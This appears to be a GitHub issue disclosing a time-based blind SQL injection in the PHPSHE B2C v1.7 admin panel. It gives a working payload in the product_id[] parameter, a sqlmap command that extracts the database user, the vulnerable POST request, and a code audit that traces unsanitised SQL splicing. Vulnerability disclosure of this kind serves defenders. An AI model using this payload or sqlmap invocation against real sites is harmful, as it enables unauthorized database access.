You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Verify by the following POC verification methods.
Vulnerability injection point:
Parameter: Array-like #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: checkall=on&product_id[]=2' AND SLEEP(5) AND 'sTmn'='sTmn&product_order[2]=10000&product_id[]=1&product_order[1]=10000
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
1.Vulnerability describes
Detection object:
(1) website name: PHPSHE CMS system V1.7
(2) website domain name: http://www.phpshe.com/
(3) the IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C system v1.7 (build 20180905 UTF8)
Detection time:
January 3, 2019
Description of vulnerability:
Lingbao JianHao network technology co., LTD. PHPSHE CMS system - SQL injection vulnerability.
2.POC and verification
Local construction environment:
1, download PHPSHE V1.7 mall system at http://www.phpshe.com/down/phpshe1.7.rar
2, the background to http://localhost/phpshe1.7/admin.php, the user/password is admin/admin
Vulnerability injection point:
vulnerability verification:
python sqlmap.py -r 11.txt --batch --random-agent -o -scope='localhost' --dbms=Mysql --current-user -v 5
11. TXT file contents:
current user: 'root@localhost'
Code audit:
Setup the environment locally.
POST /phpshe1.7/admin.php?mod=product&act=state&state=1&token=84ba604db8935c8201fa2af409f11741
Line 87 of admin.php enters the product.php logic after the submission.
Pe_update function updates the database
![3](https://user-images.githubusercontent.com/16933557/50735937-19412100-11f1-11e9-9cfc-949734a2c334.jpg)
product=product $product_id=(sql)$_g_state=state
Pe_update function calls _dowhere to process conditional statements.
![4](https://user-images.githubusercontent.com/16933557/50735941-23631f80-11f1-11e9-9e58-814f1ecd0582.jpg)
3._dowhere function Sql splicing.
![5](https://user-images.githubusercontent.com/16933557/50735948-31b13b80-11f1-11e9-86c5-a5098417c1b8.jpg)
When sqlwhere statement is returned after splicing, please note that the malicious code has been spliced successfully
![6](https://user-images.githubusercontent.com/16933557/50735951-38d84980-11f1-11e9-9ea3-579ee0fed44e.jpg)
Finally, the database was updated successfully
![7](https://user-images.githubusercontent.com/16933557/50735953-41308480-11f1-11e9-87c8-f10ab72c94c0.jpg)
![8](https://user-images.githubusercontent.com/16933557/50735956-48579280-11f1-11e9-841e-68d8f99ff77f.jpg)
![9](https://user-images.githubusercontent.com/16933557/50735960-4ee60a00-11f1-11e9-9430-d18769679e1c.jpg)
The text was updated successfully, but these errors were encountered: